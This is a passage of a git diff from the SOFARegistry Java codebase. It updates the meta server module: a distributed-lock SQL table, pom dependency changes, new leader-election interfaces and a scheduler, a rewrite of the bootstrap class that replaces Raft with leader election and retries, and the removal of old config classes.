'持续周期', + `gmt_create` timestamp(3) NOT NULL DEFAULT CURRENT_TIMESTAMP(3) COMMENT '创建时间', + `gmt_modified` timestamp(3) NOT NULL DEFAULT CURRENT_TIMESTAMP(3) ON UPDATE CURRENT_TIMESTAMP(3) COMMENT '修改时间', + PRIMARY KEY (`id`), + UNIQUE KEY `uk_data_center_lock` (`data_center`(128), `lock_name`(1024)) BLOCK_SIZE 16384 GLOBAL, + KEY `idx_lock_owner` (`owner`(512)) BLOCK_SIZE 16384 GLOBAL +) AUTO_INCREMENT = 1 DEFAULT CHARSET = utf8mb4 ROW_FORMAT = DYNAMIC COMPRESSION = 'zstd_1.0' REPLICA_NUM = 3 BLOCK_SIZE = 16384 USE_BLOOM_FILTER = FALSE TABLET_SIZE = 134217728 PCTFREE = 10 COMMENT = '分布式锁' + + + + + + + + + + + + + + + + diff --git a/server/server/meta/pom.xml b/server/server/meta/pom.xml index 9c8ded95a..0b552eb81 100644 --- a/server/server/meta/pom.xml +++ b/server/server/meta/pom.xml @@ -5,7 +5,7 @@ com.alipay.sofa registry-server - 5.2.0-SNAPSHOT + 6.0.1 ../pom.xml 4.0.0 @@ -17,10 +17,6 @@ - - org.springframework.boot - spring-boot-starter - org.springframework.boot spring-boot-starter-test @@ -50,6 +46,10 @@ com.alipay.sofa registry-common-model + + com.alipay.sofa + registry-server-shared + com.alipay.sofa.common sofa-common-tools @@ -81,18 +81,23 @@ test - org.powermock - powermock-module-junit4 - test + com.alipay.sofa + registry-store-common - org.powermock - powermock-api-mockito - test + com.alipay.sofa + registry-store-jdbc - com.alipay.sofa - registry-store-jraft + com.github.rholder + guava-retrying + 1.0.7 + + + com.h2database + h2 + 1.4.200 + test @@ -117,6 +122,28 @@ + + + + + + + + + + + + + + + + + + + + + + diff --git a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/MetaApplication.java b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/MetaApplication.java index 0869d1851..4024aebcf 100644 --- a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/MetaApplication.java +++ b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/MetaApplication.java @@ -21,24 +21,28 @@ import com.alipay.sofa.registry.server.meta.bootstrap.EnableMetaServer; import org.springframework.boot.SpringApplication; import org.springframework.boot.autoconfigure.SpringBootApplication; +import org.springframework.boot.autoconfigure.jdbc.DataSourceAutoConfiguration; +import org.springframework.scheduling.annotation.EnableScheduling; /** - * * @author zhuoyu.sjw * @version $Id: MetaApplication.java, v 0.1 2017-11-13 19:03 zhuoyu.sjw Exp $$ */ @EnableMetaServer -@SpringBootApplication +@SpringBootApplication(exclude = {DataSourceAutoConfiguration.class}) +@EnableScheduling public class MetaApplication { - private static final Logger LOGGER = LoggerFactory.getLogger(MetaApplication.class); + private static final Logger LOGGER = LoggerFactory.getLogger(MetaApplication.class); - public static void main(String[] args) { - // setup DefaultUncaughtExceptionHandler - Thread.setDefaultUncaughtExceptionHandler((t, e) -> { - LOGGER.error(String.format("UncaughtException in Thread(%s): %s", t.getName(), e.getMessage()), e); + public static void main(String[] args) { + // setup DefaultUncaughtExceptionHandler + Thread.setDefaultUncaughtExceptionHandler( + (t, e) -> { + LOGGER.error( + String.format("UncaughtException in Thread(%s): %s", t.getName(), e.getMessage()), e); }); - SpringApplication.run(MetaApplication.class, args); - } + SpringApplication.run(MetaApplication.class, args); + } } diff --git a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/MetaLeaderService.java b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/MetaLeaderService.java new file mode 100644 index 000000000..f2b13837e --- /dev/null +++ b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/MetaLeaderService.java @@ -0,0 +1,68 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.meta; + +/** + * @author chen.zhu + *

Mar 10, 2021 + */ +public interface MetaLeaderService { + + /** + * Am i elector boolean. + * + * @return the boolean + */ + boolean amILeader(); + + /** + * Gets get elector. + * + * @return the get elector + */ + String getLeader(); + + /** + * Gets get elector epoch. + * + * @return the get elector epoch + */ + long getLeaderEpoch(); + + /** + * Gets get meta server elector state. + * + * @return the get meta server elector state + */ + boolean isWarmuped(); + + /** + * Am i stable as elector boolean. + * + * @return the boolean + */ + default boolean amIStableAsLeader() { + return amILeader() && isWarmuped(); + } + + public interface MetaLeaderElectorListener { + + void becomeLeader(); + + void loseLeader(); + } +} diff --git a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/MetaServer.java b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/MetaServer.java new file mode 100644 index 000000000..7fe92ff0c --- /dev/null +++ b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/MetaServer.java @@ -0,0 +1,26 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.meta; + +import com.alipay.sofa.registry.lifecycle.Lifecycle; +import com.alipay.sofa.registry.server.meta.slot.SlotTableAware; + +/** + * @author chen.zhu + *

Nov 13, 2020 + */ +public interface MetaServer extends SlotTableAware, Lifecycle {} diff --git a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/bootstrap/AbstractNodeConfigBean.java b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/bootstrap/AbstractNodeConfigBean.java deleted file mode 100644 index c5b8e78a5..000000000 --- a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/bootstrap/AbstractNodeConfigBean.java +++ /dev/null @@ -1,130 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.server.meta.bootstrap; - -import com.alipay.sofa.registry.log.Logger; -import com.alipay.sofa.registry.log.LoggerFactory; -import com.alipay.sofa.registry.net.NetUtil; - -import java.util.ArrayList; -import java.util.Collection; -import java.util.HashMap; -import java.util.HashSet; -import java.util.List; -import java.util.Map; -import java.util.Set; -import java.util.concurrent.atomic.AtomicReference; - -/** - * - * @author shangyu.wh - * @version $Id: AbstractNodeConfigBean.java, v 0.1 2018-05-03 16:14 shangyu.wh Exp $ - */ -public abstract class AbstractNodeConfigBean implements NodeConfig { - - private static final Logger LOGGER = LoggerFactory - .getLogger(AbstractNodeConfigBean.class); - - protected Map> metaNodeIP; - - private Map dataCenterMetaIPCache = new HashMap<>(); - - /** - * Getter method for property metaNodeIP. - * - * @return property value of metaNodeIP - */ - @Override - public Map> getMetaNodeIP() { - if (metaNodeIP == null || metaNodeIP.isEmpty()) { - metaNodeIP = convertToIP(getMetaNode()); - } - return metaNodeIP; - } - - private Map> convertToIP(Map> input) { - - Map> ret = new HashMap<>(); - try { - - if (input != null) { - input.forEach((dataCenter, domains) -> { - if (domains != null) { - List ipList = new ArrayList<>(); - domains.forEach((domain) -> { - if (domain != null) { - String ip = NetUtil.getIPAddressFromDomain(domain); - if (ip == null) { - LOGGER.error("Node config convert domain {} error!", domain); - throw new RuntimeException("Node config convert domain {" + domain + "} error!"); - } - ipList.add(ip); - } - }); - ret.put(dataCenter, ipList); - } - }); - } - } catch (Exception e) { - LOGGER.error("Node config convert domain error!", e); - throw new RuntimeException("Node config convert domain error!", e); - } - return ret; - } - - @Override - public String getMetaDataCenter(String metaIpAddress) { - if (metaIpAddress == null || metaIpAddress.isEmpty()) { - LOGGER.error("IpAddress:" + metaIpAddress + " cannot be null!"); - return null; - } - - String dataCenterRet = dataCenterMetaIPCache.get(metaIpAddress); - - if (dataCenterRet == null || dataCenterRet.isEmpty()) { - Map> metaList = getMetaNodeIP(); - - AtomicReference ret = new AtomicReference<>(); - metaList.forEach((dataCenter, list) -> { - if (list.contains(metaIpAddress)) { - ret.set(dataCenter); - } - }); - - if (ret.get() == null) { - LOGGER.error("node ipAddress:" + metaIpAddress + " cannot be found on config list!"); - } - dataCenterRet = ret.get(); - } - return dataCenterRet; - } - - @Override - public Set getDataCenterMetaServers(String dataCenterIn) { - Map> metaMap = getMetaNodeIP(); - Set metaServerIpSet = new HashSet<>(); - if (metaMap != null && metaMap.size() > 0) { - Collection list = metaMap.get(dataCenterIn); - if (list != null) { - metaServerIpSet.addAll(list); - } - - } - return metaServerIpSet; - } - -} \ No newline at end of file diff --git a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/bootstrap/EnableMetaServer.java b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/bootstrap/EnableMetaServer.java index f2126b7ca..5f6feee3f 100644 --- a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/bootstrap/EnableMetaServer.java +++ b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/bootstrap/EnableMetaServer.java @@ -16,16 +16,10 @@ */ package com.alipay.sofa.registry.server.meta.bootstrap; +import java.lang.annotation.*; import org.springframework.context.annotation.Import; -import java.lang.annotation.Documented; -import java.lang.annotation.ElementType; -import java.lang.annotation.Retention; -import java.lang.annotation.RetentionPolicy; -import java.lang.annotation.Target; - /** - * * @author shangyu.wh * @version $Id: EnableMetaServer.java, v 0.1 2018-01-16 11:26 shangyu.wh Exp $ */ @@ -33,5 +27,4 @@ @Retention(RetentionPolicy.RUNTIME) @Documented @Import(MetaServerConfiguration.class) -public @interface EnableMetaServer { -} \ No newline at end of file +public @interface EnableMetaServer {} diff --git a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/bootstrap/ExecutorManager.java b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/bootstrap/ExecutorManager.java new file mode 100644 index 000000000..c732ccbe6 --- /dev/null +++ b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/bootstrap/ExecutorManager.java @@ -0,0 +1,57 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.meta.bootstrap; + +import com.alipay.sofa.registry.server.meta.bootstrap.config.MetaServerConfig; +import com.alipay.sofa.registry.server.meta.revision.AppRevisionHeartbeatService; +import com.alipay.sofa.registry.util.NamedThreadFactory; +import java.util.concurrent.ScheduledThreadPoolExecutor; +import java.util.concurrent.TimeUnit; +import org.springframework.beans.factory.annotation.Autowired; + +/** + * @author xiaojian.xj + * @version $Id: ExecutorManager.java, v 0.1 2021年04月20日 14:15 xiaojian.xj Exp $ + */ +public class ExecutorManager { + + private final ScheduledThreadPoolExecutor scheduler; + + @Autowired private MetaServerConfig metaServerConfig; + + @Autowired private AppRevisionHeartbeatService appRevisionHeartbeatService; + + public ExecutorManager(MetaServerConfig metaServerConfig) { + scheduler = + new ScheduledThreadPoolExecutor( + metaServerConfig.getMetaSchedulerPoolSize(), new NamedThreadFactory("MetaScheduler")); + } + + public void startScheduler() { + scheduler.scheduleWithFixedDelay( + () -> appRevisionHeartbeatService.doRevisionGc(), + metaServerConfig.getRevisionGcInitialDelaySecs(), + metaServerConfig.getRevisionGcSecs(), + TimeUnit.SECONDS); + } + + public void stopScheduler() { + if (scheduler != null && !scheduler.isShutdown()) { + scheduler.shutdown(); + } + } +} diff --git a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/bootstrap/MetaServerBootstrap.java b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/bootstrap/MetaServerBootstrap.java index 613b338cf..7e138c6ab 100644 --- a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/bootstrap/MetaServerBootstrap.java +++ b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/bootstrap/MetaServerBootstrap.java @@ -16,278 +16,342 @@ */ package com.alipay.sofa.registry.server.meta.bootstrap; +import com.alipay.sofa.common.profile.StringUtil; import com.alipay.sofa.registry.common.model.store.URL; import com.alipay.sofa.registry.log.Logger; import com.alipay.sofa.registry.log.LoggerFactory; +import com.alipay.sofa.registry.metrics.ReporterUtils; import com.alipay.sofa.registry.net.NetUtil; import com.alipay.sofa.registry.remoting.ChannelHandler; import com.alipay.sofa.registry.remoting.Server; import com.alipay.sofa.registry.remoting.exchange.Exchange; -import com.alipay.sofa.registry.server.meta.executor.ExecutorManager; -import com.alipay.sofa.registry.server.meta.remoting.RaftExchanger; -import com.alipay.sofa.registry.server.meta.remoting.handler.AbstractServerHandler; -import com.alipay.sofa.registry.task.batcher.TaskDispatchers; -import org.glassfish.jersey.server.ResourceConfig; -import org.springframework.beans.factory.annotation.Autowired; -import org.springframework.context.ApplicationContext; - -import javax.annotation.Resource; -import javax.ws.rs.Path; -import javax.ws.rs.ext.Provider; +import com.alipay.sofa.registry.server.meta.bootstrap.config.MetaServerConfig; +import com.alipay.sofa.registry.server.meta.remoting.meta.MetaNodeExchange; +import com.alipay.sofa.registry.server.meta.remoting.meta.MetaServerRenewService; +import com.alipay.sofa.registry.server.shared.env.ServerEnv; +import com.alipay.sofa.registry.server.shared.remoting.AbstractServerHandler; +import com.alipay.sofa.registry.store.api.elector.LeaderElector; +import com.github.rholder.retry.Retryer; +import com.github.rholder.retry.RetryerBuilder; +import com.github.rholder.retry.StopStrategies; +import com.github.rholder.retry.WaitStrategies; +import com.google.common.base.Predicate; import java.lang.annotation.Annotation; import java.util.Collection; import java.util.Date; import java.util.Map; +import java.util.concurrent.TimeUnit; import java.util.concurrent.atomic.AtomicBoolean; +import javax.annotation.Resource; +import javax.ws.rs.Path; +import javax.ws.rs.ext.Provider; +import org.apache.commons.lang.StringUtils; +import org.glassfish.jersey.server.ResourceConfig; +import org.springframework.beans.factory.annotation.Autowired; +import org.springframework.context.ApplicationContext; /** - * * @author shangyu.wh * @version $Id: MetaServerBootstrap.java, v 0.1 2018-01-16 11:28 shangyu.wh Exp $ */ public class MetaServerBootstrap { - private static final Logger LOGGER = LoggerFactory - .getLogger(MetaServerBootstrap.class); + private static final Logger LOGGER = LoggerFactory.getLogger(MetaServerBootstrap.class); - @Autowired - private MetaServerConfig metaServerConfig; + @Autowired private MetaServerConfig metaServerConfig; - @Autowired - private Exchange boltExchange; + @Autowired private Exchange boltExchange; - @Autowired - private Exchange jerseyExchange; + @Autowired private Exchange jerseyExchange; - @Autowired - private ExecutorManager executorManager; + @Autowired private ExecutorManager executorManager; - @Resource(name = "sessionServerHandlers") - private Collection sessionServerHandlers; + @Resource(name = "sessionServerHandlers") + private Collection sessionServerHandlers; - @Resource(name = "dataServerHandlers") - private Collection dataServerHandlers; + @Resource(name = "dataServerHandlers") + private Collection dataServerHandlers; - @Resource(name = "metaServerHandlers") - private Collection metaServerHandlers; + @Resource(name = "metaServerHandlers") + private Collection metaServerHandlers; - @Autowired - private ResourceConfig jerseyResourceConfig; + @Autowired private ResourceConfig jerseyResourceConfig; - @Autowired - private ApplicationContext applicationContext; + @Autowired private ApplicationContext applicationContext; - @Autowired - private RaftExchanger raftExchanger; + @Autowired private LeaderElector leaderElector; - private Server sessionServer; + @Autowired private MetaServerRenewService metaServerRenewService; - private Server dataServer; + @Autowired private MetaNodeExchange metaNodeExchange; - private Server metaServer; + private Server sessionServer; - private Server httpServer; + private Server dataServer; - private AtomicBoolean sessionStart = new AtomicBoolean(false); + private Server metaServer; - private AtomicBoolean dataStart = new AtomicBoolean(false); + private Server httpServer; - private AtomicBoolean metaStart = new AtomicBoolean(false); + private final AtomicBoolean rpcServerForSessionStarted = new AtomicBoolean(false); - private AtomicBoolean httpStart = new AtomicBoolean(false); + private final AtomicBoolean rpcServerForDataStarted = new AtomicBoolean(false); - /** - * Do initialized. - */ - public void doInitialized() { - try { - openSessionRegisterServer(); + private final AtomicBoolean rpcServerForMetaStarted = new AtomicBoolean(false); - openDataRegisterServer(); + private final AtomicBoolean httpServerStarted = new AtomicBoolean(false); - openMetaRegisterServer(); + private final AtomicBoolean schedulerStart = new AtomicBoolean(false); - openHttpServer(); + private final Retryer retryer = + RetryerBuilder.newBuilder() + .retryIfException() + .retryIfResult( + new Predicate() { + @Override + public boolean apply(Boolean input) { + return !input; + } + }) + .withWaitStrategy(WaitStrategies.exponentialWait(1000, 10000, TimeUnit.MILLISECONDS)) + .withStopStrategy(StopStrategies.stopAfterAttempt(10)) + .build(); + /** Do initialized. */ + public void start() { + try { + LOGGER.info("release properties: {}", ServerEnv.getReleaseProps()); + LOGGER.info("the configuration items are as follows: " + metaServerConfig.toString()); + ReporterUtils.enablePrometheusDefaultExports(); - initRaft(); + openSessionRegisterServer(); - Runtime.getRuntime().addShutdownHook(new Thread(this::doStop)); - } catch (Throwable e) { - LOGGER.error("Bootstrap Meta Server got error!", e); - throw new RuntimeException("Bootstrap Meta Server got error!", e); - } - } + openDataRegisterServer(); - public void destroy() { - doStop(); - } + openMetaRegisterServer(); - private void doStop() { - try { - LOGGER.info("{} Shutting down Meta Server..", new Date().toString()); + openHttpServer(); - executorManager.stopScheduler(); + // meta start loop to elector leader + startElectorLoop(); - TaskDispatchers.stopDefaultSingleTaskDispatcher(); + retryer.call( + () -> { + LOGGER.info( + "[MetaBootstrap] retry elector meta leader: {}, epoch:{}", + leaderElector.getLeader(), + leaderElector.getLeaderEpoch()); + return !StringUtils.isEmpty(leaderElector.getLeader()); + }); - stopServer(); + startScheduler(); - } catch (Throwable e) { - LOGGER.error("Shutting down Meta Server error!", e); - } - LOGGER.info("{} Meta server is now shutdown...", new Date().toString()); - } + // start renew node + renewNode(); + retryer.call( + () -> { + LOGGER.info( + "[MetaBootstrap] retry connect to meta leader: {}, client:{}", + metaNodeExchange.getMetaLeader(), + metaNodeExchange.getClient()); + return StringUtil.isNotEmpty(metaNodeExchange.getMetaLeader()) + && metaNodeExchange.getClient() != null; + }); - private void openSessionRegisterServer() { - try { - if (sessionStart.compareAndSet(false, true)) { - sessionServer = boltExchange - .open( - new URL(NetUtil.getLocalAddress().getHostAddress(), metaServerConfig - .getSessionServerPort()), sessionServerHandlers - .toArray(new ChannelHandler[sessionServerHandlers.size()])); - - LOGGER.info("Open session node register server port {} success!", - metaServerConfig.getSessionServerPort()); - } - } catch (Exception e) { - sessionStart.set(false); - LOGGER.error("Open session node register server port {} error!", - metaServerConfig.getSessionServerPort(), e); - throw new RuntimeException("Open session node register server error!", e); - } + LOGGER.info( + "[MetaBootstrap] leader info: {}, [{}]", + leaderElector.getLeader(), + leaderElector.getLeaderEpoch()); + Runtime.getRuntime().addShutdownHook(new Thread(this::doStop)); + } catch (Throwable e) { + LOGGER.error("Bootstrap Meta Server got error!", e); + throw new RuntimeException("Bootstrap Meta Server got error!", e); } - - private void openDataRegisterServer() { - try { - if (dataStart.compareAndSet(false, true)) { - dataServer = boltExchange.open(new URL(NetUtil.getLocalAddress().getHostAddress(), - metaServerConfig.getDataServerPort()), dataServerHandlers - .toArray(new ChannelHandler[dataServerHandlers.size()])); - - LOGGER.info("Open data node register server port {} success!", - metaServerConfig.getDataServerPort()); - } - } catch (Exception e) { - dataStart.set(false); - LOGGER.error("Open data node register server port {} error!", - metaServerConfig.getDataServerPort(), e); - throw new RuntimeException("Open data node register server error!", e); - } + } + + private void startElectorLoop() { + leaderElector.change2Follow(); + } + + private void startScheduler() { + + try { + if (schedulerStart.compareAndSet(false, true)) { + executorManager.startScheduler(); + LOGGER.info("Meta Scheduler started!"); + } + } catch (Exception e) { + schedulerStart.set(false); + LOGGER.error("Meta Scheduler start error!", e); + throw new RuntimeException("Meta Scheduler start error!", e); } + } - private void openMetaRegisterServer() { - try { - if (metaStart.compareAndSet(false, true)) { - metaServer = boltExchange.open(new URL(NetUtil.getLocalAddress().getHostAddress(), - metaServerConfig.getMetaServerPort()), metaServerHandlers - .toArray(new ChannelHandler[metaServerHandlers.size()])); - - LOGGER.info("Open meta server port {} success!", - metaServerConfig.getMetaServerPort()); - } - } catch (Exception e) { - metaStart.set(false); - LOGGER - .error("Open meta server port {} error!", metaServerConfig.getMetaServerPort(), e); - throw new RuntimeException("Open meta server error!", e); - } - } + public void destroy() { + doStop(); + } - private void openHttpServer() { - try { - if (httpStart.compareAndSet(false, true)) { - bindResourceConfig(); - httpServer = jerseyExchange.open( - new URL(NetUtil.getLocalAddress().getHostAddress(), metaServerConfig - .getHttpServerPort()), new ResourceConfig[] { jerseyResourceConfig }); - LOGGER.info("Open http server port {} success!", - metaServerConfig.getHttpServerPort()); - } - } catch (Exception e) { - httpStart.set(false); - LOGGER - .error("Open http server port {} error!", metaServerConfig.getHttpServerPort(), e); - throw new RuntimeException("Open http server error!", e); - } - } + private void doStop() { + try { + LOGGER.info("{} Shutting down Meta Server..", new Date().toString()); - private void bindResourceConfig() { - registerInstances(Path.class); - registerInstances(Provider.class); - } + executorManager.stopScheduler(); + stopServer(); - private void registerInstances(Class annotationType) { - Map beans = applicationContext.getBeansWithAnnotation(annotationType); - if (beans != null && beans.size() > 0) { - beans.forEach((beanName, bean) -> jerseyResourceConfig.registerInstances(bean)); - } + } catch (Throwable e) { + LOGGER.error("Shutting down Meta Server error!", e); } - - private void initRaft() { - raftExchanger.startRaftServer(executorManager); - LOGGER.info("Raft server port {} start success!group {}", - metaServerConfig.getRaftServerPort(), metaServerConfig.getRaftGroup()); - - raftExchanger.startRaftClient(); - LOGGER.info("Raft client connect success!"); - - raftExchanger.startCliService(); - LOGGER.info("Raft start CliService success!"); - + LOGGER.info("{} Meta server is now shutdown...", new Date().toString()); + } + + private void renewNode() { + metaServerRenewService.startRenewer( + metaServerConfig.getSchedulerHeartbeatIntervalSecs() * 1000); + } + + private void openSessionRegisterServer() { + try { + if (rpcServerForSessionStarted.compareAndSet(false, true)) { + sessionServer = + boltExchange.open( + new URL( + NetUtil.getLocalAddress().getHostAddress(), + metaServerConfig.getSessionServerPort()), + sessionServerHandlers.toArray(new ChannelHandler[sessionServerHandlers.size()])); + + LOGGER.info( + "Open session node register server port {} success!", + metaServerConfig.getSessionServerPort()); + } + } catch (Exception e) { + rpcServerForSessionStarted.set(false); + LOGGER.error( + "Open session node register server port {} error!", + metaServerConfig.getSessionServerPort(), + e); + throw new RuntimeException("Open session node register server error!", e); } - - private void stopServer() { - if (sessionServer != null && sessionServer.isOpen()) { - sessionServer.close(); - } - if (dataServer != null && dataServer.isOpen()) { - dataServer.close(); - } - if (metaServer != null && metaServer.isOpen()) { - metaServer.close(); - } - if (httpServer != null && httpServer.isOpen()) { - httpServer.close(); - } - if (raftExchanger != null) { - raftExchanger.shutdown(); - } + } + + private void openDataRegisterServer() { + try { + if (rpcServerForDataStarted.compareAndSet(false, true)) { + dataServer = + boltExchange.open( + new URL( + NetUtil.getLocalAddress().getHostAddress(), + metaServerConfig.getDataServerPort()), + dataServerHandlers.toArray(new ChannelHandler[dataServerHandlers.size()])); + + LOGGER.info( + "Open data node register server port {} success!", + metaServerConfig.getDataServerPort()); + } + } catch (Exception e) { + rpcServerForDataStarted.set(false); + LOGGER.error( + "Open data node register server port {} error!", metaServerConfig.getDataServerPort(), e); + throw new RuntimeException("Open data node register server error!", e); } - - /** - * Getter method for property sessionStart. - * - * @return property value of sessionStart - */ - public AtomicBoolean getSessionStart() { - return sessionStart; + } + + private void openMetaRegisterServer() { + try { + if (rpcServerForMetaStarted.compareAndSet(false, true)) { + metaServer = + boltExchange.open( + new URL( + NetUtil.getLocalAddress().getHostAddress(), + metaServerConfig.getMetaServerPort()), + metaServerHandlers.toArray(new ChannelHandler[metaServerHandlers.size()])); + + LOGGER.info("Open meta server port {} success!", metaServerConfig.getMetaServerPort()); + } + } catch (Exception e) { + rpcServerForMetaStarted.set(false); + LOGGER.error("Open meta server port {} error!", metaServerConfig.getMetaServerPort(), e); + throw new RuntimeException("Open meta server error!", e); } - - /** - * Getter method for property dataStart. - * - * @return property value of dataStart - */ - public AtomicBoolean getDataStart() { - return dataStart; + } + + private void openHttpServer() { + try { + if (httpServerStarted.compareAndSet(false, true)) { + bindResourceConfig(); + httpServer = + jerseyExchange.open( + new URL( + NetUtil.getLocalAddress().getHostAddress(), + metaServerConfig.getHttpServerPort()), + new ResourceConfig[] {jerseyResourceConfig}); + LOGGER.info("Open http server port {} success!", metaServerConfig.getHttpServerPort()); + } + } catch (Exception e) { + httpServerStarted.set(false); + LOGGER.error("Open http server port {} error!", metaServerConfig.getHttpServerPort(), e); + throw new RuntimeException("Open http server error!", e); } + } - /** - * Getter method for property metaStart. - * - * @return property value of metaStart - */ - public AtomicBoolean getMetaStart() { - return metaStart; + private void bindResourceConfig() { + registerInstances(Path.class); + registerInstances(Provider.class); + } + + private void registerInstances(Class annotationType) { + Map beans = applicationContext.getBeansWithAnnotation(annotationType); + if (beans != null && beans.size() > 0) { + beans.forEach((beanName, bean) -> jerseyResourceConfig.registerInstances(bean)); } + } - /** - * Getter method for property httpStart. - * - * @return property value of httpStart - */ - public AtomicBoolean getHttpStart() { - return httpStart; + private void stopServer() { + if (sessionServer != null && sessionServer.isOpen()) { + sessionServer.close(); + } + if (dataServer != null && dataServer.isOpen()) { + dataServer.close(); + } + if (metaServer != null && metaServer.isOpen()) { + metaServer.close(); + } + if (httpServer != null && httpServer.isOpen()) { + httpServer.close(); } -} \ No newline at end of file + } + + /** + * Getter method for property sessionStart. + * + * @return property value of sessionStart + */ + public boolean isRpcServerForSessionStarted() { + return rpcServerForSessionStarted.get(); + } + + /** + * Getter method for property dataStart. + * + * @return property value of dataStart + */ + public boolean isRpcServerForDataStarted() { + return rpcServerForDataStarted.get(); + } + + /** + * Getter method for property metaStart. + * + * @return property value of metaStart + */ + public boolean isRpcServerForMetaStarted() { + return rpcServerForMetaStarted.get(); + } + + /** + * Getter method for property httpStart. + * + * @return property value of httpStart + */ + public boolean isHttpServerStarted() { + return httpServerStarted.get(); + } +} diff --git a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/bootstrap/MetaServerConfig.java b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/bootstrap/MetaServerConfig.java deleted file mode 100644 index d4b09b38b..000000000 --- a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/bootstrap/MetaServerConfig.java +++ /dev/null @@ -1,90 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.server.meta.bootstrap; - -/** - * - * @author shangyu.wh - * @version $Id: MetaServerConfig.java, v 0.1 2018-01-16 10:58 shangyu.wh Exp $ - */ -public interface MetaServerConfig { - int getSessionServerPort(); - - int getDataServerPort(); - - int getMetaServerPort(); - - int getHttpServerPort(); - - int getRaftServerPort(); - - int getSchedulerHeartbeatTimeout(); - - int getSchedulerHeartbeatFirstDelay(); - - int getSchedulerHeartbeatExpBackOffBound(); - - int getSchedulerGetDataChangeTimeout(); - - int getSchedulerGetDataChangeFirstDelay(); - - int getSchedulerGetDataChangeExpBackOffBound(); - - int getSchedulerConnectMetaServerTimeout(); - - int getSchedulerConnectMetaServerFirstDelay(); - - int getSchedulerConnectMetaServerExpBackOffBound(); - - int getSchedulerCheckNodeListChangePushTimeout(); - - int getSchedulerCheckNodeListChangePushFirstDelay(); - - int getSchedulerCheckNodeListChangePushExpBackOffBound(); - - int getDataNodeExchangeTimeout(); - - int getSessionNodeExchangeTimeout(); - - int getMetaNodeExchangeTimeout(); - - DecisionMode getDecisionMode(); - - int getDataCenterChangeNotifyTaskRetryTimes(); - - int getDataNodeChangePushTaskRetryTimes(); - - int getGetDataCenterChangeListTaskRetryTimes(); - - int getReceiveStatusConfirmNotifyTaskRetryTimes(); - - int getSessionNodeChangePushTaskRetryTimes(); - - String getRaftGroup(); - - String getRaftDataPath(); - - 